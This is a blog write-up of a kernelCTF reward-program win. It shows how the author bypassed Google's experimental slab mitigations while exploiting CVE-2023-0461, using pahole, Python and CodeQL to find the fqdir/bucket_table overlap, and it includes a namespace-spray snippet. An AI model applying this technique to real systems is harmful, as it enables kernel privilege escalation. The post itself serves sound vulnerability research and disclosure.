In 2023, Google launched a new Vulnerability Reward Program (VRP) called kernelCTF. I was fortunate enough to get first blood by compromising the instance with experimental mitigations.
In this article, after providing a brief overview of the mitigations, I will focus on the process I followed to identify the kernel objects used to compromise the system. Hopefully, this can be useful for those who are new to the field or are just curious about how certain unusual structures end up being utilized in kernel exploits.
The complete technical analysis of the exploit can be found in the Google Security Research repository.
The Path To Experimental Mitigations
In 2022, I participated in the kCTF Vulnerability Reward Program and managed to compromise Google’s hardened Kubernetes infrastructure with a novel exploitation technique that can be utilized to perform privilege escalation with a single byte written out-of-bounds.
All the kernel exploits submitted during the year have been collected in the Kernel Exploit Recipes Notebook, a book created by sirdarkcat to document all the different techniques.
Google engineers analyzed all the exploits and developed experimental mitigations with the intent to stop entire classes of attacks. They mainly focused on preventing elastic objects from being easily used to exploit vulnerabilities in the kernel heap, and on preventing cross-cache attacks.
All details about the mitigations can be found in the MITIGATION_README. Here I will provide you with a short description:
- CONFIG_KMALLOC_SPLIT_VARSIZE aims to be the elastic object killer by separating dynamic structures from fixed-size objects. If the size of an object can be determined at compile time, the object is allocated in kmalloc slabs dedicated to fixed-size objects; otherwise, it is allocated in a slab for dynamic objects (see the sketch after this list). As a downside, when objects are separated into multiple caches, slabs tend to be less prone to noise, and this leads to increased exploit stability. Furthermore, if the vulnerable object is allocated in a cache containing dynamic objects, this mitigation actually facilitates the exploitation process.
- CONFIG_SLAB_VIRTUAL is designed to stop cross-cache attacks. It allocates SLUB objects from a dedicated virtual memory region and ensures that slab virtual memory is never reused for a different slab. Optionally, it is also possible to add virtual guards between slabs. This protection is very effective, but it does not cover allocations above a certain size, as larger requests (> 8192 bytes) are passed directly to the page allocator.
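As a rough illustration of the size-based split (my own sketch, not code from the mitigation; the structure, sizes, and function name below are made up), the deciding factor is simply whether the allocation size is a compile-time constant:
#include <linux/slab.h>

/* Hypothetical structure, sized so that it would land in kmalloc-512. */
struct fixed_thing {
        char buf[480];
};

static void split_varsize_example(size_t user_len)
{
        /* sizeof(*obj) is a compile-time constant: under the mitigation this
         * allocation is served from a fixed-size cache (kmalloc-512). */
        struct fixed_thing *obj = kzalloc(sizeof(*obj), GFP_KERNEL);

        /* user_len is only known at runtime: the allocation is served from a
         * separate dyn-kmalloc-* cache, so elastic objects can no longer
         * share slabs with fixed-size ones. */
        void *elastic = kzalloc(user_len, GFP_KERNEL);

        kfree(elastic);
        kfree(obj);
}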
In 2023, Google launched the new kernelCTF VRP, so I decided to participate, utilizing a vulnerability for which I had already written an exploit a short time before.
From UAF To PTSD
Some time before the launch of the new VRP, as an exercise, I wrote an exploit for CVE-2023-0461, a Use-After-Free vulnerability caused by a missing check in the ULP subsystem of the Linux kernel, exploitable through the TLS subsystem.
With the original exploit, I was able to perform privilege escalation on multiple Linux distributions with less than 200 lines of code, without requiring a leak or a ROP chain. So when Google launched the new VRP, I thought I could use it to compromise the instance with experimental mitigations.
Unfortunately for me, on that system, it was a completely different story.
The bug I was trying to exploit was a Use-After-Free in kmalloc-512 that could easily be turned into a Double-Free. However, the object separation offered by CONFIG_KMALLOC_SPLIT_VARSIZE completely ruled out my original exploitation strategy, as the vulnerable object and the attacking objects were now allocated in separate caches, and with CONFIG_SLAB_VIRTUAL enabled, I could not use a cross-cache attack.
I won’t cover a full day of failed attempts here, but I will mention that after one more unsuccessful attempt to cause a race condition in kmalloc-512 to overlap two linux_binprm objects and use the overlapped binprm->cred pointers to cause a UAF in cred_jar, I realized I was on the right track; I only needed something slightly different.
The pointer overlapping approach was correct, but I needed to overlap two pointers to dynamic structures, making them point to the same object. This would have allowed me to easily transfer exploitation primitives from one cache to another by causing a UAF in the dynamic cache from kmalloc-512.
Looking For A Structure
Manually analyzing thousands of kernel structures (and nested structures) to find a field that satisfies certain properties can be a tedious task. So at that point, I could proceed in two ways:
- The 1337 way: write an advanced object analyzer in Rust integrated with CodeQL, capable of extracting structures from vmlinux using the DWARF format and automatically identifying exploitable objects.
- The lazy way: use pahole to dump all the kernel structures into a file and extend a Python library I wrote one year earlier to analyze kernel objects.
Aaand of course, I chose the second option: I used pahole to extract all the kernel structures from vmlinux:
pahole --suppress_aligned_attribute --suppress_packed --suppress_force_paddings --fixup_silly_bitfields --structs vmlinux > kernelctf-mitigation-structs
Then, I extended libksp, a library I coded some time ago, to parse the pahole output and convert raw structures into Python objects. I added a deep_search() method to the Structure class to dig into nested structures and look for fields that satisfy certain conditions:
class Structure:
    [...]
    def deep_search(self, ksp, path="", offset=0, condition=lambda member: False):
        path = self.get_name() if not path else path
        for member in self:
            current_path = f"{path}.{member.get_name()}"
            total_offset = offset + member.get_offset()
            # Recurse into embedded (non-pointer) structures
            if not member.is_ptr() and member.is_struct():
                if nested_struct := ksp.get_struct(name=member.get_type_name()):
                    nested_struct.deep_search(ksp, current_path, total_offset, condition)
            # Otherwise, report the member if it satisfies the given condition
            elif condition(member):
                print(f"Found: {current_path}, Offset: {total_offset}, Type: {member.get_type_name()}")
    [...]
At this point, I only needed to code a function that returns True when certain conditions are met (is_ptr_to_dynamic_struct()), and loop through the structures, calling deep_search():
from libksp import KernelStructParser as KSP

ksp = KSP("./kernelctf-mitigation-structs")
structs = ksp.parse_structs()

def is_ptr_to_dynamic_struct(member):
    # True for non-function pointers to structures allocated in a dynamic cache
    if member.is_ptr() and not member.is_fptr() and member.is_struct():
        if struct := ksp.get_struct(name=member.get_type_name()):
            if struct.is_dyn():
                return True
    return False

tls_context = ksp.get_struct(name="tls_context")
tls_context_cache = tls_context.get_cache()  # kmalloc-512

# Scan every fixed-size structure that shares the cache of the vulnerable object
for struct in structs:
    if not struct.is_dyn() and struct.get_cache() == tls_context_cache:
        struct.deep_search(ksp, condition=is_ptr_to_dynamic_struct)
The program returned many findings:
Found: srcu_struct.work.wq, Offset: 368, Type: workqueue_struct
Found: linux_binprm.mm, Offset: 16, Type: mm_struct
Found: bio_set.rescue_list.head, Offset: 320, Type: bio
Found: bio_set.rescue_list.tail, Offset: 328, Type: bio
Found: bio_set.rescue_workqueue, Offset: 368, Type: workqueue_struct
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
Found: netdev_queue.qdisc, Offset: 8, Type: Qdisc
Found: netdev_queue.qdisc_sleeping, Offset: 16, Type: Qdisc
Found: netdev_queue.pool, Offset: 120, Type: xsk_buff_pool
Found: kvm_page_track_notifier_head.track_srcu.work.wq, Offset: 368, Type: workqueue_struct
Found: intel_uncore_pmu.boxes, Offset: 352, Type: intel_uncore_box
Found: bpf_offloaded_map.map.kptr_off_tab, Offset: 56, Type: bpf_map_value_off
--- output cut here ---
[...]
One that caught my attention was the bucket_table pointer in fqdir.rhashtable.tbl:
Found: fqdir.rhashtable.tbl, Offset: 64, Type: bucket_table
fqdir contains a nested rhashtable structure, rhashtable contains a pointer to a bucket_table object, and bucket_table is allocated in a dynamic cache. Exactly what I was looking for.
Here is the fqdir structure, followed by the nested rhashtable structure:
struct fqdir {
long int high_thresh; /* 0 8 */
long int low_thresh; /* 8 8 */
int timeout; /* 16 4 */
int max_dist; /* 20 4 */
struct inet_frags * f; /* 24 8 */
struct net * net; /* 32 8 */
bool dead; /* 40 1 */
struct rhashtable rhashtable; /* 64 136 */
atomic_long_t mem; /* 256 8 */
struct work_struct destroy_work; /* 264 32 */
struct llist_node free_list; /* 296 8 */
/* size: 320, cachelines: 5, members: 11 */
/* sum members: 225, holes: 2, sum holes: 79 */
/* padding: 16 */
};
struct rhashtable {
struct bucket_table * tbl; /* 0 8 */
unsigned int key_len; /* 8 4 */
unsigned int max_elems; /* 12 4 */
struct rhashtable_params p; /* 16 40 */
bool rhlist; /* 56 1 */
struct work_struct run_work; /* 64 32 */
struct mutex mutex; /* 96 32 */
spinlock_t lock; /* 128 4 */
atomic_t nelems; /* 132 4 */
/* size: 136, cachelines: 3, members: 9 */
/* sum members: 129, holes: 1, sum holes: 7 */
/* last cacheline: 8 bytes */
};
And the bucket_table object, allocated in a dynamic cache (in our case dyn-kmalloc-1k):
struct bucket_table {
unsigned int size; /* 0 4 */
unsigned int nest; /* 4 4 */
u32 hash_rnd; /* 8 4 */
struct list_head walkers; /* 16 16 */
struct callback_head rcu; /* 32 16 */
struct bucket_table * future_tbl; /* 48 8 */
struct lockdep_map dep_map; /* 56 0 */
struct rhash_lock_head * buckets[]; /* 64 0 */
/* size: 64, cachelines: 1, members: 8 */
/* sum members: 52, holes: 2, sum holes: 12 */
};
At this point, I only needed to know how the fqdir object was allocated, so I used pwnql, a CodeQL wrapper I wrote some time ago, to retrieve all the places where the object is allocated by the kernel. The program automatically generated a CodeQL query similar to:
import cpp
import utils

Type Deref(Type t) {
    result = t.(DerivedType).getBaseType()
}

Type RecursiveDeref(Type t) {
    t.getPointerIndirectionLevel() = 0 and result = t or
    t.getPointerIndirectionLevel() > 0 and
    result = RecursiveDeref(Deref(t))
}

class KmallocFunction extends Function {
    KmallocFunction() {
        this.getName().regexpMatch("k[^_]*alloc[_a-z]*") or
        this.getName().matches("%kmemdup%")
    }
}

class KmallocFunctionCall extends FunctionCall {
    KmallocFunctionCall() {
        this.getTarget() instanceof KmallocFunction
    }
}

class StructAllocatedByKmalloc extends Struct {
    KmallocFunctionCall kfc;

    StructAllocatedByKmalloc() {
        this = RecursiveDeref(kfc.getFullyConverted().getType())
    }

    KmallocFunctionCall getAFunctionCall() {
        result = kfc
    }
}

from StructAllocatedByKmalloc structure
where structure.getName().matches("%fqdir%")
select structure.getLocation(),
    "Struct=" + structure.getName() +
    ",AllocatedBy=" + structure.getAFunctionCall().getLocation() +
    ",Size=" + structure.getSize() +
    ",Cache=" + kmallocSlab(structure.getSize())
Then, after executing it, the query returned the following result:
❯ pwnql alloc --struct fqdir
[+] Query 1: Search structures allocated by `k[^_]*alloc[_a-z]*` containing "fqdir" in name
[*] Result:
╰─ Struct: fqdir
╰─ AllocatedBy: "https://elixir.bootlin.com/linux/v6.1/source/net/ipv4/inet_fragment.c#L188"
╰─ Size: 320
╰─ Cache: kmalloc-512
And indeed, if we read the net/ipv4/inet_fragment.c source code, we have:
int fqdir_init(struct fqdir **fqdirp, struct inet_frags *f, struct net *net)
{
        struct fqdir *fqdir = kzalloc(sizeof(*fqdir), GFP_KERNEL);
        int res;

        if (!fqdir)
                return -ENOMEM;
        fqdir->f = f;
        fqdir->net = net;
        res = rhashtable_init(&fqdir->rhashtable, &fqdir->f->rhash_params);
        if (res < 0) {
                kfree(fqdir);
                return res;
        }
        refcount_inc(&f->refcnt);
        *fqdirp = fqdir;
        return 0;
}
After some source code reading, I found that fqdir_init() is called by ipv4_frags_init_net(), ipv6_frags_init_net(), and by netfilter when a new network namespace is initialized. The bucket_table in the rhashtable structure is automatically allocated by bucket_table_alloc() when rhashtable_init() is called in fqdir_init().
To trigger the fqdir allocations, it is only necessary to create a new network namespace using unshare(CLONE_NEWNET). After a chain of calls (create_new_namespaces() -> copy_net_ns() -> setup_net()), setup_net() will initialize all the per-namespace networking subsystems, and fqdir will be allocated.
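Here is a minimal userspace sketch of that trigger (my own illustration; the task count is arbitrary and error handling is kept to the essentials):
#define _GNU_SOURCE
#include <sched.h>
#include <unistd.h>
#include <err.h>

#define NR_TASKS 16   /* arbitrary number of tasks/namespaces to spray */

int main(void)
{
        for (int i = 0; i < NR_TASKS; i++) {
                if (fork() == 0) {
                        /* CLONE_NEWNET requires CAP_SYS_ADMIN in the current
                         * user namespace; an unprivileged process can
                         * unshare(CLONE_NEWUSER) first to obtain it. */
                        if (unshare(CLONE_NEWNET) < 0)
                                err(1, "unshare(CLONE_NEWNET)");
                        /* setup_net() has now allocated this namespace's
                         * fqdir objects in kmalloc-512; block to keep the
                         * namespace (and the objects) alive. */
                        pause();
                }
        }
        pause();   /* a real exploit would continue from here */
        return 0;
}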
At this point, I was able to orchestrate multiple tasks and call unshare(CLONE_NEWNET) from each of them to allocate multiple fqdir objects, overlapping two of them in kmalloc-512 to cause a UAF in dyn-kmalloc-1k, thanks to the overlapped bucket_table pointers. Finally, I could transfer exploitation primitives from one cache to another, unlock dynamic objects, and complete the exploitation process.
All details about the exploit can be found in the Google Security Research repository.
Conclusion
In this brief blog post, I examined how Google’s experimental mitigations work and outlined the process I followed to identify the attacking objects used to compromise their hardened system. While these mitigations represent a significant advancement in kernel security, this analysis shows that vulnerabilities can still be exploited through unconventional approaches.
All the tools mentioned in this article are expected to be open-sourced in the near future.
Cheers!